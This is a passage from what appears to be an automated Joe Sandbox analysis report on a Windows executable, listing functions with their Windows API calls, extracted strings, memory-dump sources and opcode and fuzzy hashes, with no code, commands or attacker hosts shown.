                                                    • Part of subcall function 0059600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
                                                  • GetWindowRect.USER32(00000000,?), ref: 0062377A
                                                  • GetSysColor.USER32(00000012), ref: 00623794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: edbf8c04b76e2c170d90ca146299a0d0094ceb68dba1a8ae88b214a9d1a732c1
                                                  • Instruction ID: b1d60ab17641907753b4a552cde2fc101dc95df35ffdf2affeefd597a9a29e42
                                                  • Opcode Fuzzy Hash: edbf8c04b76e2c170d90ca146299a0d0094ceb68dba1a8ae88b214a9d1a732c1
                                                  • Instruction Fuzzy Hash: 1A1159B261061AAFDF00DFA8DC45AEE7BBAFB08314F004514F955E3250E774E8219B50
                                                  Function 0060CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0060CD7D
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0060CDA6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: b736b605037fbbc4927110505ed8d79a18ecea4ca8698744906509bae6ad7e4c
                                                  • Instruction ID: 45f78b564bcb623cd9ef86504cec9176fb4d67920606ce46646be75a66eb710a
                                                  • Opcode Fuzzy Hash: b736b605037fbbc4927110505ed8d79a18ecea4ca8698744906509bae6ad7e4c
                                                  • Instruction Fuzzy Hash: F611A071295631BAD7384B668C49EE7BEAAEF527B4F00432AB109831C0E6609845D6F0
                                                  Function 00623429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 006234AB
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006234BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 1bf8838f6121b4cd24ae270a84bf42d5f9224357f963d0753046d641d7ac017d
                                                  • Instruction ID: 95a64064fc8ec55abdeb81b3c6d51a172418091e417ca63b2f938c04567a1ae3
                                                  • Opcode Fuzzy Hash: 1bf8838f6121b4cd24ae270a84bf42d5f9224357f963d0753046d641d7ac017d
                                                  • Instruction Fuzzy Hash: 64119D71500929AAEB216E64EC44AEA3BABEB05374F504364FA60973D0C779DC529F60
                                                  Function 005F6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • CharUpperBuffW.USER32(?,?,?), ref: 005F6CB6
                                                  • _wcslen.LIBCMT ref: 005F6CC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharUpper
                                                  • String ID: STOP
                                                  • API String ID: 1256254125-2411985666
                                                  • Opcode ID: 3cbd7216e3319e65051b9471920d38e7e4d1617a3f29349dcae1bde6e094d347
                                                  • Instruction ID: 80299e0d6b384413ef6b3f49736be85a6c44af639550376db5524884425746ff
                                                  • Opcode Fuzzy Hash: 3cbd7216e3319e65051b9471920d38e7e4d1617a3f29349dcae1bde6e094d347
                                                  • Instruction Fuzzy Hash: 4701C43261052B9ACB209FBDDC859BF7FB5FBA1710B500928E9A2D7195EA39DD00C650
                                                  Function 005F1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 005F1C46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_wcslen
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 624084870-1403004172
                                                  • Opcode ID: 403c211ce14deb09934e8b6ec80ee98f92ff6290d5604da3361f409f31129296
                                                  • Instruction ID: e0cff0807532de5fd3ee6469e0531391caee06c4b206f8120acf75e4177a04be
                                                  • Opcode Fuzzy Hash: 403c211ce14deb09934e8b6ec80ee98f92ff6290d5604da3361f409f31129296
                                                  • Instruction Fuzzy Hash: 6F01F77168010DA6CF04EB94CE699FF7BA8BF51340F10001EAA1673281EA289E0CC6B5
                                                  Function 005F1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 005F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 005F3CCA
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 005F1CC8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_wcslen
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 624084870-1403004172
                                                  • Opcode ID: 547ca72d4bb3492a03919ed04540739b1a87b3743ff5a2f28cb504a8fd9a5d0e
                                                  • Instruction ID: b8153a770a80c8486d34d629d69fb14218304d9742bb78bb2195f6ec9d8d370e
                                                  • Opcode Fuzzy Hash: 547ca72d4bb3492a03919ed04540739b1a87b3743ff5a2f28cb504a8fd9a5d0e
                                                  • Instruction Fuzzy Hash: B301DB71A4051DA7DF14EB95CE1AAFE7FACBF51380F140019B91273281EA299F08C675
                                                  Function 005AA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 005AA529
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer_wcslen
                                                  • String ID: ,%f$3y^
                                                  • API String ID: 2551934079-2939242258
                                                  • Opcode ID: aa6d5d56ab44998d869bf8cb03c5bbfcc36dfa1c608193d1899738b7947df62b
                                                  • Instruction ID: 34bc85c96eb5264e067318c075484caf58bd6bb9e843933bbcb55a7766ccfc98
                                                  • Opcode Fuzzy Hash: aa6d5d56ab44998d869bf8cb03c5bbfcc36dfa1c608193d1899738b7947df62b
                                                  • Instruction Fuzzy Hash: CB012B31B01A124BCE14F76CDC2FAAD7F59BB8A710F401429F512571C2EF50AD01C69B
                                                  Function 00628172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00663018,0066305C), ref: 006281BF
                                                  • CloseHandle.KERNEL32 ref: 006281D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: \0f
                                                  • API String ID: 3712363035-3782278232
                                                  • Opcode ID: 9880aa6a90b0d20ea5e8bda0d21a0439a5cd5f61d8e0c4b02f09faec43654b9a
                                                  • Instruction ID: e108d7f48ead5d43027da91940f53babd68604d5af75b502e13d963800650df0
                                                  • Opcode Fuzzy Hash: 9880aa6a90b0d20ea5e8bda0d21a0439a5cd5f61d8e0c4b02f09faec43654b9a
                                                  • Instruction Fuzzy Hash: 8BF089B1640721BEE3206B656C49FBB3E5EEB04764F001420FB08D52A2D6B59E1487F8
                                                  Function 0061747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: 3, 3, 16, 1
                                                  • API String ID: 176396367-3042988571
                                                  • Opcode ID: f1f65e91ac26899d436e79e80601029a21445996f9872884650924f2b2174994
                                                  • Instruction ID: 9afd7916a7a87e7107760aa8fbbaa4d865e5a81ff1ff3d20537856f997259d26
                                                  • Opcode Fuzzy Hash: f1f65e91ac26899d436e79e80601029a21445996f9872884650924f2b2174994
                                                  • Instruction Fuzzy Hash: F0E02B022042211093311279ACC59FF5ADBDFC97A1718182BF981C2367EA949DD193A0
                                                  Function 005F0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005F0B23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 2030045667-4017498283
                                                  • Opcode ID: 03b33a82023abe7c4d7aba4962e53a2b7075413c587b93c7e35b11d5d552e761
                                                  • Instruction ID: 756945a491b015eeb2ee57f9c7a5b9ef21aa1ee8e17e844b71bcb7252339c11b
                                                  • Opcode Fuzzy Hash: 03b33a82023abe7c4d7aba4962e53a2b7075413c587b93c7e35b11d5d552e761
                                                  • Instruction Fuzzy Hash: DDE0D83124471926D22437947C0BFCD7EC9AF05B65F100426FB48554C38AE264900AEA
                                                  Function 005B0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005AF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005B0D71,?,?,?,0059100A), ref: 005AF7CE
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0059100A), ref: 005B0D75
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0059100A), ref: 005B0D84
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005B0D7F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 55579361-631824599
                                                  • Opcode ID: 747434c0f708576bae3b4b98cf303e874e97834cf6f2620b5fe8761b5eb6b778
                                                  • Instruction ID: a74cd3897d128a138d9b65661f01b3e5490de83ec7a7949271f87f36ab37e617
                                                  • Opcode Fuzzy Hash: 747434c0f708576bae3b4b98cf303e874e97834cf6f2620b5fe8761b5eb6b778
                                                  • Instruction Fuzzy Hash: A2E03970200B118FD7309FA8E4083967FE1BB00744F01592DE482C66A1DBB1E4458B91
                                                  Function 005AE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 005AE3D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: 0%f$8%f
                                                  • API String ID: 1385522511-1024914575
                                                  • Opcode ID: 73bf765b08976110d30de336258566b6578e2db9124e581fd1f5430cad22d91a
                                                  • Instruction ID: e8499c8be656e4461019df547e4380db14850bcb31236055001ea5960811fdeb
                                                  • Opcode Fuzzy Hash: 73bf765b08976110d30de336258566b6578e2db9124e581fd1f5430cad22d91a
                                                  • Instruction Fuzzy Hash: BDE08631414D12CBCF249B1CF8BAA8D3B57BB46320B502977E113871D1BB703C418655
                                                  Function 005ED21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: %.3d$X64
                                                  • API String ID: 481472006-1077770165
                                                  • Opcode ID: 52d89993d8c71815247e024a3a10b4e82c9430e9b7fbb67ac166cb00b5ca3816
                                                  • Instruction ID: 9c915665acc56e1bda11dc0c655e14ca7d344d4649c160493319945c4f7ac61c
                                                  • Opcode Fuzzy Hash: 52d89993d8c71815247e024a3a10b4e82c9430e9b7fbb67ac166cb00b5ca3816
                                                  • Instruction Fuzzy Hash: 42D01265C09149E9CB9496E1DC498BDBB7CBB19341F508852FE56A1040E634C5086771
                                                  Function 00622356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062236C
                                                  • PostMessageW.USER32(00000000), ref: 00622373
                                                    • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 167c2429b66275e26fb31f92fb51defd816f2966475b8af279dc2e7918467207
                                                  • Instruction ID: 124ee3df2e6cdaee00c39b395c58a7dec0cd7aa39135fd508a7c7630df96400f
                                                  • Opcode Fuzzy Hash: 167c2429b66275e26fb31f92fb51defd816f2966475b8af279dc2e7918467207
                                                  • Instruction Fuzzy Hash: 0DD0C932381B14BAE674A770DC0FFCA6A16AB44B21F415A167745AA1E0C9F4A806CA54
                                                  Function 00622322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062232C
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0062233F
                                                    • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 6e9598e881ef4df1aba474305e650a31a894e63d2afd3537857235c7df12ed59
                                                  • Instruction ID: 4b0b6d2ac3b79391ba57d5738bda051152111f82eda50b719de37f5a863985a2
                                                  • Opcode Fuzzy Hash: 6e9598e881ef4df1aba474305e650a31a894e63d2afd3537857235c7df12ed59
                                                  • Instruction Fuzzy Hash: A7D02232380B00B7E374B730DC0FFCE7A06AB00B20F004A027705AA0E0C8F0A802CA10